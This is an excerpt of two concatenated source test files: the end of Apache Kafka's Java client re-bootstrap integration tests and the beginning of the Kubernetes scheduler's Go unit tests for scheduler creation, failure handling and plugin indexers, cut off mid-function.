// Only the broker 1 is available for the producer during the bootstrap.
var recordMetadata0 = producer.send(new ProducerRecord<>(TOPIC, "value 0".getBytes())).get();
assertEquals(0, recordMetadata0.offset());
clusterInstance.shutdownBroker(broker1);
clusterInstance.startBroker(broker0);
// Current broker 1 is offline.
// However, the broker 0 from the bootstrap list is online.
// Should be able to produce records.
var recordMetadata1 = producer.send(new ProducerRecord<>(TOPIC, "value 1".getBytes())).get();
assertEquals(0, recordMetadata1.offset());
}
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
}
)
public void testProducerRebootstrapDisabled(ClusterInstance clusterInstance) throws ExecutionException, InterruptedException {
try (var admin = clusterInstance.admin()) {
admin.createTopics(List.of(new NewTopic(TOPIC, PARTITIONS, (short) REPLICAS)));
}
var broker0 = 0;
var broker1 = 1;
// It's ok to shut the leader down, cause the reelection is small enough to the producer timeout.
clusterInstance.shutdownBroker(broker0);
var producer = clusterInstance.producer(Map.of(CommonClientConfigs.METADATA_RECOVERY_STRATEGY_CONFIG, "none"));
// Only the broker 1 is available for the producer during the bootstrap.
var recordMetadata0 = producer.send(new ProducerRecord<>(TOPIC, "value 0".getBytes())).get();
assertEquals(0, recordMetadata0.offset());
clusterInstance.shutdownBroker(broker1);
clusterInstance.startBroker(broker0);
// The broker 1, originally cached during the bootstrap, is offline.
// As a result, the producer will throw a TimeoutException when trying to send a message.
assertThrows(TimeoutException.class, () -> producer.send(new ProducerRecord<>(TOPIC, "value 1".getBytes())).get(5, TimeUnit.SECONDS));
// Since the brokers cached during the bootstrap are offline, the producer needs to wait the default timeout for other threads.
producer.close(Duration.ZERO);
}
public void consumerRebootstrap(ClusterInstance clusterInstance, GroupProtocol groupProtocol) throws InterruptedException, ExecutionException {
clusterInstance.createTopic(TOPIC, PARTITIONS, (short) REPLICAS);
var broker0 = 0;
var broker1 = 1;
var partitions = List.of(new TopicPartition(TOPIC, 0));
try (var producer = clusterInstance.producer(Map.of(ProducerConfig.ACKS_CONFIG, "-1"))) {
var recordMetadata = producer.send(new ProducerRecord<>(TOPIC, "value 0".getBytes())).get();
assertEquals(0, recordMetadata.offset());
}
clusterInstance.shutdownBroker(broker0);
try (var consumer = clusterInstance.consumer(Map.of(ConsumerConfig.GROUP_PROTOCOL_CONFIG, groupProtocol.name))) {
// Only the server 1 is available for the consumer during the bootstrap.
consumer.assign(partitions);
consumer.seekToBeginning(partitions);
TestUtils.waitForCondition(() -> consumer.poll(Duration.ofMillis(100)).count() == 1, 10 * 1000, "Failed to poll data.");
// Bring back the server 0 and shut down 1.
clusterInstance.shutdownBroker(broker1);
clusterInstance.startBroker(broker0);
try (var producer = clusterInstance.producer(Map.of(ProducerConfig.ACKS_CONFIG, "-1"))) {
var recordMetadata = producer.send(new ProducerRecord<>(TOPIC, "value 1".getBytes())).get();
assertEquals(1, recordMetadata.offset());
}
// The server 1 originally cached during the bootstrap, is offline.
// However, the server 0 from the bootstrap list is online.
TestUtils.waitForCondition(() -> consumer.poll(Duration.ofMillis(100)).count() == 1, 10 * 1000, "Failed to poll data.");
}
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2"),
})
public void testClassicConsumerRebootstrap(ClusterInstance clusterInstance) throws InterruptedException, ExecutionException {
consumerRebootstrap(clusterInstance, GroupProtocol.CLASSIC);
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2"),
})
public void testConsumerRebootstrap(ClusterInstance clusterInstance) throws InterruptedException, ExecutionException {
consumerRebootstrap(clusterInstance, GroupProtocol.CONSUMER);
}
// Exercises the non-recovery path: with METADATA_RECOVERY_STRATEGY_CONFIG set
// to "none" the consumer must NOT fall back to the bootstrap list. Once the
// broker it cached at startup goes down, it stops making progress even though
// another broker from the bootstrap list is back online.
public void consumerRebootstrapDisabled(ClusterInstance clusterInstance, GroupProtocol groupProtocol) throws InterruptedException, ExecutionException {
    clusterInstance.createTopic(TOPIC, PARTITIONS, (short) REPLICAS);
    final int firstBroker = 0;
    final int secondBroker = 1;
    final TopicPartition partition = new TopicPartition(TOPIC, 0);

    // Produce the first record while every replica is still alive.
    try (var producer = clusterInstance.producer(Map.of(ProducerConfig.ACKS_CONFIG, "-1"))) {
        assertEquals(0, producer.send(new ProducerRecord<>(TOPIC, "value 0".getBytes())).get().offset());
    }

    clusterInstance.shutdownBroker(firstBroker);

    try (var consumer = clusterInstance.consumer(Map.of(
        CommonClientConfigs.METADATA_RECOVERY_STRATEGY_CONFIG, "none",
        ConsumerConfig.GROUP_PROTOCOL_CONFIG, groupProtocol.name)
    )) {
        // Only the second broker is reachable while the consumer bootstraps,
        // so that is the broker it caches.
        consumer.assign(List.of(partition));
        consumer.seekToBeginning(List.of(partition));
        TestUtils.waitForCondition(() -> consumer.poll(Duration.ofMillis(100)).count() == 1, 10 * 1000, "Failed to poll data.");

        // Swap which broker is alive: stop the cached broker, restart the
        // one from the bootstrap list.
        clusterInstance.shutdownBroker(secondBroker);
        clusterInstance.startBroker(firstBroker);

        try (var producer = clusterInstance.producer(Map.of(ProducerConfig.ACKS_CONFIG, "-1"))) {
            assertEquals(1, producer.send(new ProducerRecord<>(TOPIC, "value 1".getBytes())).get().offset());
        }

        // Re-bootstrap is disabled, so the consumer keeps targeting the dead
        // cached broker and polls nothing, even though broker 0 from the
        // bootstrap list is online again.
        assertEquals(0, consumer.poll(Duration.ofMillis(100)).count());
    }
}
// Re-bootstrap disabled: a CLASSIC-protocol consumer must not recover via the
// bootstrap list once its cached broker is gone. Delegates to the shared
// consumerRebootstrapDisabled() body.
@ClusterTest(
    brokers = REPLICAS,
    types = {Type.KRAFT},
    serverProperties = {
        @ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
        @ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
    }
)
public void testClassicConsumerRebootstrapDisabled(ClusterInstance clusterInstance) throws InterruptedException, ExecutionException {
    consumerRebootstrapDisabled(clusterInstance, GroupProtocol.CLASSIC);
}
// Same disabled-re-bootstrap scenario, driven with the new CONSUMER group
// protocol. Delegates to the shared consumerRebootstrapDisabled() body.
@ClusterTest(
    brokers = REPLICAS,
    types = {Type.KRAFT},
    serverProperties = {
        @ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
        @ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
    }
)
public void testConsumerRebootstrapDisabled(ClusterInstance clusterInstance) throws InterruptedException, ExecutionException {
    consumerRebootstrapDisabled(clusterInstance, GroupProtocol.CONSUMER);
}
} | java | github | https://github.com/apache/kafka | clients/clients-integration-tests/src/test/java/org/apache/kafka/clients/ClientRebootstrapTest.java |
/*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package scheduler
import (
"context"
"errors"
"fmt"
"slices"
"sort"
"strings"
"sync"
"testing"
"time"
"github.com/google/go-cmp/cmp"
"github.com/onsi/gomega"
v1 "k8s.io/api/core/v1"
eventsv1 "k8s.io/api/events/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/apimachinery/pkg/util/version"
"k8s.io/apiserver/pkg/util/feature"
"k8s.io/client-go/informers"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/kubernetes/fake"
"k8s.io/client-go/kubernetes/scheme"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/events"
featuregatetesting "k8s.io/component-base/featuregate/testing"
"k8s.io/klog/v2"
"k8s.io/klog/v2/ktesting"
fwk "k8s.io/kube-scheduler/framework"
"k8s.io/kubernetes/pkg/features"
schedulerapi "k8s.io/kubernetes/pkg/scheduler/apis/config"
"k8s.io/kubernetes/pkg/scheduler/apis/config/testing/defaults"
apicache "k8s.io/kubernetes/pkg/scheduler/backend/api_cache"
apidispatcher "k8s.io/kubernetes/pkg/scheduler/backend/api_dispatcher"
internalcache "k8s.io/kubernetes/pkg/scheduler/backend/cache"
internalqueue "k8s.io/kubernetes/pkg/scheduler/backend/queue"
"k8s.io/kubernetes/pkg/scheduler/framework"
apicalls "k8s.io/kubernetes/pkg/scheduler/framework/api_calls"
"k8s.io/kubernetes/pkg/scheduler/framework/plugins"
"k8s.io/kubernetes/pkg/scheduler/framework/plugins/defaultbinder"
"k8s.io/kubernetes/pkg/scheduler/framework/plugins/names"
"k8s.io/kubernetes/pkg/scheduler/framework/plugins/queuesort"
frameworkruntime "k8s.io/kubernetes/pkg/scheduler/framework/runtime"
"k8s.io/kubernetes/pkg/scheduler/metrics"
"k8s.io/kubernetes/pkg/scheduler/profile"
st "k8s.io/kubernetes/pkg/scheduler/testing"
tf "k8s.io/kubernetes/pkg/scheduler/testing/framework"
utiltesting "k8s.io/kubernetes/test/utils/ktesting"
testingclock "k8s.io/utils/clock/testing"
"k8s.io/utils/ptr"
)
// init registers the scheduler's metrics once for the whole test package;
// the scheduler code exercised below records into these collectors.
func init() {
	metrics.Register()
}
// TestSchedulerCreation verifies that scheduler.New builds profiles and
// extenders from the supplied options, and rejects invalid configurations:
// an out-of-tree plugin that shadows an in-tree name, and duplicate profile
// names.
func TestSchedulerCreation(t *testing.T) {
	// Registers DefaultBinder under its in-tree name, so New must fail with a
	// duplicate-plugin error.
	invalidRegistry := map[string]frameworkruntime.PluginFactory{
		defaultbinder.Name: defaultbinder.New,
	}
	validRegistry := map[string]frameworkruntime.PluginFactory{
		"Foo": defaultbinder.New,
	}
	cases := []struct {
		name          string
		opts          []Option
		wantErr       string   // substring expected in the error from New; empty means success expected
		wantProfiles  []string // sorted scheduler-profile names expected on the created Scheduler
		wantExtenders []string // extender names expected on both the Scheduler and each framework handle
	}{
		{
			name: "valid out-of-tree registry",
			opts: []Option{
				WithFrameworkOutOfTreeRegistry(validRegistry),
				WithProfiles(
					schedulerapi.KubeSchedulerProfile{
						SchedulerName: "default-scheduler",
						Plugins: &schedulerapi.Plugins{
							QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
							Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
						},
					},
				)},
			wantProfiles: []string{"default-scheduler"},
		},
		{
			name: "repeated plugin name in out-of-tree plugin",
			opts: []Option{
				WithFrameworkOutOfTreeRegistry(invalidRegistry),
				WithProfiles(
					schedulerapi.KubeSchedulerProfile{
						SchedulerName: "default-scheduler",
						Plugins: &schedulerapi.Plugins{
							QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
							Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
						},
					},
				)},
			wantProfiles: []string{"default-scheduler"},
			wantErr:      "a plugin named DefaultBinder already exists",
		},
		{
			name: "multiple profiles",
			opts: []Option{
				WithProfiles(
					schedulerapi.KubeSchedulerProfile{
						SchedulerName: "foo",
						Plugins: &schedulerapi.Plugins{
							QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
							Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
						},
					},
					schedulerapi.KubeSchedulerProfile{
						SchedulerName: "bar",
						Plugins: &schedulerapi.Plugins{
							QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
							Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
						},
					},
				)},
			// Sorted order, not declaration order.
			wantProfiles: []string{"bar", "foo"},
		},
		{
			name: "Repeated profiles",
			opts: []Option{
				WithProfiles(
					schedulerapi.KubeSchedulerProfile{
						SchedulerName: "foo",
						Plugins: &schedulerapi.Plugins{
							QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
							Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
						},
					},
					schedulerapi.KubeSchedulerProfile{
						SchedulerName: "bar",
						Plugins: &schedulerapi.Plugins{
							QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
							Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
						},
					},
					schedulerapi.KubeSchedulerProfile{
						SchedulerName: "foo",
						Plugins: &schedulerapi.Plugins{
							QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
							Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
						},
					},
				)},
			wantErr: "duplicate profile with scheduler name \"foo\"",
		},
		{
			name: "With extenders",
			opts: []Option{
				WithProfiles(
					schedulerapi.KubeSchedulerProfile{
						SchedulerName: "default-scheduler",
						Plugins: &schedulerapi.Plugins{
							QueueSort: schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "PrioritySort"}}},
							Bind:      schedulerapi.PluginSet{Enabled: []schedulerapi.Plugin{{Name: "DefaultBinder"}}},
						},
					},
				),
				WithExtenders(
					schedulerapi.Extender{
						URLPrefix: "http://extender.kube-system/",
					},
				),
			},
			wantProfiles:  []string{"default-scheduler"},
			wantExtenders: []string{"http://extender.kube-system/"},
		},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			client := fake.NewClientset()
			informerFactory := informers.NewSharedInformerFactory(client, 0)
			eventBroadcaster := events.NewBroadcaster(&events.EventSinkImpl{Interface: client.EventsV1()})
			_, ctx := ktesting.NewTestContext(t)
			ctx, cancel := context.WithCancel(ctx)
			defer cancel()
			s, err := New(
				ctx,
				client,
				informerFactory,
				nil,
				profile.NewRecorderFactory(eventBroadcaster),
				tc.opts...,
			)
			// Errors
			if len(tc.wantErr) != 0 {
				if err == nil || !strings.Contains(err.Error(), tc.wantErr) {
					t.Errorf("got error %q, want %q", err, tc.wantErr)
				}
				return
			}
			if err != nil {
				t.Fatalf("Failed to create scheduler: %v", err)
			}
			// Profiles
			profiles := make([]string, 0, len(s.Profiles))
			for name := range s.Profiles {
				profiles = append(profiles, name)
			}
			// Map iteration order is random; sort for a stable comparison.
			sort.Strings(profiles)
			if diff := cmp.Diff(tc.wantProfiles, profiles); diff != "" {
				t.Errorf("unexpected profiles (-want, +got):\n%s", diff)
			}
			// Extenders
			if len(tc.wantExtenders) != 0 {
				// Scheduler.Extenders
				extenders := make([]string, 0, len(s.Extenders))
				for _, e := range s.Extenders {
					extenders = append(extenders, e.Name())
				}
				if diff := cmp.Diff(tc.wantExtenders, extenders); diff != "" {
					t.Errorf("unexpected extenders (-want, +got):\n%s", diff)
				}
				// fwk.Handle.Extenders(): each profile's framework handle must
				// expose the same extender list.
				for _, p := range s.Profiles {
					extenders := make([]string, 0, len(p.Extenders()))
					for _, e := range p.Extenders() {
						extenders = append(extenders, e.Name())
					}
					if diff := cmp.Diff(tc.wantExtenders, extenders); diff != "" {
						t.Errorf("unexpected extenders (-want, +got):\n%s", diff)
					}
				}
			}
		})
	}
}
// TestFailureHandler verifies that the scheduler's FailureHandler re-queues an
// unschedulable pod using the pod's latest observed state (picking up updates
// that happened mid-cycle) and drops the pod entirely if it was deleted
// mid-cycle. Both the synchronous and asynchronous API-call paths are covered.
func TestFailureHandler(t *testing.T) {
	metrics.Register()
	testPod := st.MakePod().Name("test-pod").Namespace(v1.NamespaceDefault).Obj()
	testPodUpdated := testPod.DeepCopy()
	testPodUpdated.Labels = map[string]string{"foo": ""}
	tests := []struct {
		name                       string
		podUpdatedDuringScheduling bool // pod is updated during a scheduling cycle
		podDeletedDuringScheduling bool // pod is deleted during a scheduling cycle
		expect                     *v1.Pod
	}{
		{
			name:                       "pod is updated during a scheduling cycle",
			podUpdatedDuringScheduling: true,
			expect:                     testPodUpdated,
		},
		{
			name:   "pod is not updated during a scheduling cycle",
			expect: testPod,
		},
		{
			name:                       "pod is deleted during a scheduling cycle",
			podDeletedDuringScheduling: true,
			expect:                     nil,
		},
	}
	for _, asyncAPICallsEnabled := range []bool{true, false} {
		for _, tt := range tests {
			t.Run(fmt.Sprintf("%s (Async API calls enabled: %v)", tt.name, asyncAPICallsEnabled), func(t *testing.T) {
				logger, ctx := ktesting.NewTestContext(t)
				ctx, cancel := context.WithCancel(ctx)
				defer cancel()
				client := fake.NewClientset(&v1.PodList{Items: []v1.Pod{*testPod}})
				informerFactory := informers.NewSharedInformerFactory(client, 0)
				podInformer := informerFactory.Core().V1().Pods()
				// Need to add/update/delete testPod to the store.
				if err := podInformer.Informer().GetStore().Add(testPod); err != nil {
					t.Fatal(err)
				}
				var apiDispatcher *apidispatcher.APIDispatcher
				if asyncAPICallsEnabled {
					apiDispatcher = apidispatcher.New(client, 16, apicalls.Relevances)
					apiDispatcher.Run(logger)
					defer apiDispatcher.Close()
				}
				recorder := metrics.NewMetricsAsyncRecorder(3, 20*time.Microsecond, ctx.Done())
				queue := internalqueue.NewPriorityQueue(nil, informerFactory, internalqueue.WithClock(testingclock.NewFakeClock(time.Now())), internalqueue.WithMetricsRecorder(recorder), internalqueue.WithAPIDispatcher(apiDispatcher))
				schedulerCache := internalcache.New(ctx, apiDispatcher)
				// Simulate an in-flight scheduling cycle: the pod has been
				// popped from the queue before the update/delete below happens.
				queue.Add(logger, testPod)
				if _, err := queue.Pop(logger); err != nil {
					t.Fatalf("Pop failed: %v", err)
				}
				if tt.podUpdatedDuringScheduling {
					if err := podInformer.Informer().GetStore().Update(testPodUpdated); err != nil {
						t.Fatal(err)
					}
					queue.Update(logger, testPod, testPodUpdated)
				}
				if tt.podDeletedDuringScheduling {
					if err := podInformer.Informer().GetStore().Delete(testPod); err != nil {
						t.Fatal(err)
					}
					queue.Delete(testPod)
				}
				s, schedFramework, err := initScheduler(ctx, schedulerCache, queue, apiDispatcher, client, informerFactory)
				if err != nil {
					t.Fatal(err)
				}
				testPodInfo := &framework.QueuedPodInfo{PodInfo: mustNewPodInfo(t, testPod)}
				s.FailureHandler(ctx, schedFramework, testPodInfo, fwk.NewStatus(fwk.Unschedulable), nil, time.Now())
				var got *v1.Pod
				if tt.podUpdatedDuringScheduling {
					pInfo, ok := queue.GetPod(testPod.Name, testPod.Namespace)
					if !ok {
						t.Fatalf("Failed to get pod %s/%s from queue", testPod.Namespace, testPod.Name)
					}
					got = pInfo.Pod
				} else {
					got = getPodFromPriorityQueue(queue, testPod)
				}
				if diff := cmp.Diff(tt.expect, got); diff != "" {
					t.Errorf("Unexpected pod (-want, +got): %s", diff)
				}
			})
		}
	}
}
// TestFailureHandler_PodAlreadyBound verifies that a pod which already has a
// NodeName assigned (i.e. it is bound) is NOT put back into the scheduling
// queue when its scheduling attempt fails — re-queuing a bound pod would make
// no sense. Covered for both sync and async API-call modes.
func TestFailureHandler_PodAlreadyBound(t *testing.T) {
	for _, asyncAPICallsEnabled := range []bool{true, false} {
		t.Run(fmt.Sprintf("Async API calls enabled: %v", asyncAPICallsEnabled), func(t *testing.T) {
			logger, ctx := ktesting.NewTestContext(t)
			ctx, cancel := context.WithCancel(ctx)
			defer cancel()
			nodeFoo := v1.Node{ObjectMeta: metav1.ObjectMeta{Name: "foo"}}
			// The pod is already bound to node "foo".
			testPod := st.MakePod().Name("test-pod").Namespace(v1.NamespaceDefault).Node("foo").Obj()
			client := fake.NewClientset(&v1.PodList{Items: []v1.Pod{*testPod}}, &v1.NodeList{Items: []v1.Node{nodeFoo}})
			informerFactory := informers.NewSharedInformerFactory(client, 0)
			podInformer := informerFactory.Core().V1().Pods()
			// Need to add testPod to the store.
			if err := podInformer.Informer().GetStore().Add(testPod); err != nil {
				t.Fatal(err)
			}
			var apiDispatcher *apidispatcher.APIDispatcher
			if asyncAPICallsEnabled {
				apiDispatcher = apidispatcher.New(client, 16, apicalls.Relevances)
				apiDispatcher.Run(logger)
				defer apiDispatcher.Close()
			}
			queue := internalqueue.NewPriorityQueue(nil, informerFactory, internalqueue.WithClock(testingclock.NewFakeClock(time.Now())), internalqueue.WithAPIDispatcher(apiDispatcher))
			schedulerCache := internalcache.New(ctx, apiDispatcher)
			// Add node to schedulerCache no matter it's deleted in API server or not.
			schedulerCache.AddNode(logger, &nodeFoo)
			s, schedFramework, err := initScheduler(ctx, schedulerCache, queue, apiDispatcher, client, informerFactory)
			if err != nil {
				t.Fatal(err)
			}
			testPodInfo := &framework.QueuedPodInfo{PodInfo: mustNewPodInfo(t, testPod)}
			s.FailureHandler(ctx, schedFramework, testPodInfo, fwk.NewStatus(fwk.Unschedulable).WithError(fmt.Errorf("binding rejected: timeout")), nil, time.Now())
			pod := getPodFromPriorityQueue(queue, testPod)
			if pod != nil {
				t.Fatalf("Unexpected pod: %v should not be in PriorityQueue when the NodeName of pod is not empty", pod.Name)
			}
		})
	}
}
// TestWithPercentageOfNodesToScore tests scheduler's PercentageOfNodesToScore
// is set correctly: a nil option falls back to the API default, a non-nil
// option is applied verbatim.
func TestWithPercentageOfNodesToScore(t *testing.T) {
	tests := []struct {
		name                           string
		percentageOfNodesToScoreConfig *int32 // value passed to the option; nil means "use default"
		wantedPercentageOfNodesToScore int32  // value expected on the created scheduler
	}{
		{
			name:                           "percentageOfNodesScore is nil",
			percentageOfNodesToScoreConfig: nil,
			wantedPercentageOfNodesToScore: schedulerapi.DefaultPercentageOfNodesToScore,
		},
		{
			name:                           "percentageOfNodesScore is not nil",
			percentageOfNodesToScoreConfig: ptr.To[int32](10),
			wantedPercentageOfNodesToScore: 10,
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			client := fake.NewClientset()
			informerFactory := informers.NewSharedInformerFactory(client, 0)
			eventBroadcaster := events.NewBroadcaster(&events.EventSinkImpl{Interface: client.EventsV1()})
			_, ctx := ktesting.NewTestContext(t)
			ctx, cancel := context.WithCancel(ctx)
			defer cancel()
			sched, err := New(
				ctx,
				client,
				informerFactory,
				nil,
				profile.NewRecorderFactory(eventBroadcaster),
				WithPercentageOfNodesToScore(tt.percentageOfNodesToScoreConfig),
			)
			if err != nil {
				t.Fatalf("Failed to create scheduler: %v", err)
			}
			if sched.percentageOfNodesToScore != tt.wantedPercentageOfNodesToScore {
				// Fixed typo in the failure message (was "percercentageOfNodesToScore").
				t.Errorf("scheduler.percentageOfNodesToScore = %v, want %v", sched.percentageOfNodesToScore, tt.wantedPercentageOfNodesToScore)
			}
		})
	}
}
// getPodFromPriorityQueue scans the pending pods of the given priority queue
// and returns the one whose namespace/name key matches the given pod, or nil
// when no pending pod matches. Key-derivation failures are treated as
// "not found".
func getPodFromPriorityQueue(queue *internalqueue.PriorityQueue, pod *v1.Pod) *v1.Pod {
	pendingPods, _ := queue.PendingPods()
	if len(pendingPods) == 0 {
		return nil
	}
	wantKey, err := cache.MetaNamespaceKeyFunc(pod)
	if err != nil {
		return nil
	}
	for _, candidate := range pendingPods {
		candidateKey, keyErr := cache.MetaNamespaceKeyFunc(candidate)
		if keyErr != nil {
			return nil
		}
		if candidateKey == wantKey {
			return candidate
		}
	}
	return nil
}
// initScheduler builds a minimal Scheduler wired to the given cache, queue,
// and (optional) API dispatcher, backed by a test framework that registers
// only the queue-sort and bind plugins. It returns both the Scheduler and the
// framework so tests can invoke FailureHandler directly.
func initScheduler(ctx context.Context, cache internalcache.Cache, queue internalqueue.SchedulingQueue, apiDispatcher *apidispatcher.APIDispatcher,
	client kubernetes.Interface, informerFactory informers.SharedInformerFactory) (*Scheduler, framework.Framework, error) {
	logger := klog.FromContext(ctx)
	registerPluginFuncs := []tf.RegisterPluginFunc{
		tf.RegisterQueueSortPlugin(queuesort.Name, queuesort.New),
		tf.RegisterBindPlugin(defaultbinder.Name, defaultbinder.New),
	}
	eventBroadcaster := events.NewBroadcaster(&events.EventSinkImpl{Interface: client.EventsV1()})
	waitingPods := frameworkruntime.NewWaitingPodsMap()
	fwk, err := tf.NewFramework(ctx,
		registerPluginFuncs,
		testSchedulerName,
		frameworkruntime.WithClientSet(client),
		frameworkruntime.WithAPIDispatcher(apiDispatcher),
		frameworkruntime.WithInformerFactory(informerFactory),
		frameworkruntime.WithEventRecorder(eventBroadcaster.NewRecorder(scheme.Scheme, testSchedulerName)),
		frameworkruntime.WithWaitingPods(waitingPods),
	)
	if err != nil {
		return nil, nil, err
	}
	// Only wire the API cacher when async API calls are in play.
	if apiDispatcher != nil {
		fwk.SetAPICacher(apicache.New(queue, cache))
	}
	s := &Scheduler{
		Cache:           cache,
		client:          client,
		StopEverything:  ctx.Done(),
		SchedulingQueue: queue,
		APIDispatcher:   apiDispatcher,
		Profiles:        profile.Map{testSchedulerName: fwk},
		logger:          logger,
	}
	// Installs the default SchedulePod/FailureHandler used by the tests.
	s.applyDefaultHandlers()
	return s, fwk, nil
}
// TestInitPluginsWithIndexers verifies that plugins can register informer
// indexers during framework construction: distinct indexer names coexist,
// while registering the same indexer name twice must fail with a conflict,
// regardless of (random) plugin initialization order.
func TestInitPluginsWithIndexers(t *testing.T) {
	tests := []struct {
		name string
		// the plugin registration ordering must not matter, being map traversal random
		entrypoints map[string]frameworkruntime.PluginFactory
		wantErr     string
	}{
		{
			name: "register indexer, no conflicts",
			entrypoints: map[string]frameworkruntime.PluginFactory{
				"AddIndexer": func(ctx context.Context, obj runtime.Object, handle fwk.Handle) (fwk.Plugin, error) {
					podInformer := handle.SharedInformerFactory().Core().V1().Pods()
					err := podInformer.Informer().AddIndexers(cache.Indexers{
						"nodeName": indexByPodSpecNodeName,
					})
					return &TestPlugin{name: "AddIndexer"}, err
				},
			},
		},
		{
			name: "register the same indexer name multiple times, conflict",
			// order of registration doesn't matter
			entrypoints: map[string]frameworkruntime.PluginFactory{
				"AddIndexer1": func(ctx context.Context, obj runtime.Object, handle fwk.Handle) (fwk.Plugin, error) {
					podInformer := handle.SharedInformerFactory().Core().V1().Pods()
					err := podInformer.Informer().AddIndexers(cache.Indexers{
						"nodeName": indexByPodSpecNodeName,
					})
					return &TestPlugin{name: "AddIndexer1"}, err
				},
				"AddIndexer2": func(ctx context.Context, obj runtime.Object, handle fwk.Handle) (fwk.Plugin, error) {
					podInformer := handle.SharedInformerFactory().Core().V1().Pods()
					err := podInformer.Informer().AddIndexers(cache.Indexers{
						"nodeName": indexByPodAnnotationNodeName,
					})
					// NOTE(review): plugin name "AddIndexer1" here looks like a
					// copy-paste slip ("AddIndexer2" expected) — harmless since
					// this case only asserts the indexer-conflict error, but
					// worth confirming.
					return &TestPlugin{name: "AddIndexer1"}, err
				},
			},
			wantErr: "indexer conflict",
		},
		{
			name: "register the same indexer body with different names, no conflicts",
			// order of registration doesn't matter
			entrypoints: map[string]frameworkruntime.PluginFactory{
				"AddIndexer1": func(ctx context.Context, obj runtime.Object, handle fwk.Handle) (fwk.Plugin, error) {
					podInformer := handle.SharedInformerFactory().Core().V1().Pods()
					err := podInformer.Informer().AddIndexers(cache.Indexers{
						"nodeName1": indexByPodSpecNodeName,
					})
					return &TestPlugin{name: "AddIndexer1"}, err
				},
				"AddIndexer2": func(ctx context.Context, obj runtime.Object, handle fwk.Handle) (fwk.Plugin, error) {
					podInformer := handle.SharedInformerFactory().Core().V1().Pods()
					err := podInformer.Informer().AddIndexers(cache.Indexers{
						"nodeName2": indexByPodAnnotationNodeName,
					})
					return &TestPlugin{name: "AddIndexer2"}, err
				},
			},
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			fakeInformerFactory := NewInformerFactory(&fake.Clientset{}, 0*time.Second)
			var registerPluginFuncs []tf.RegisterPluginFunc
			for name, entrypoint := range tt.entrypoints {
				registerPluginFuncs = append(registerPluginFuncs,
					// anything supported by TestPlugin is fine
					tf.RegisterFilterPlugin(name, entrypoint),
				)
			}
			// we always need this
			registerPluginFuncs = append(registerPluginFuncs,
				tf.RegisterQueueSortPlugin(queuesort.Name, queuesort.New),
				tf.RegisterBindPlugin(defaultbinder.Name, defaultbinder.New),
			)
			_, ctx := ktesting.NewTestContext(t)
			ctx, cancel := context.WithCancel(ctx)
			defer cancel()
			_, err := tf.NewFramework(ctx, registerPluginFuncs, "test", frameworkruntime.WithInformerFactory(fakeInformerFactory))
			if len(tt.wantErr) > 0 {
				if err == nil || !strings.Contains(err.Error(), tt.wantErr) {
					t.Errorf("got error %q, want %q", err, tt.wantErr)
				}
				return
			}
			if err != nil {
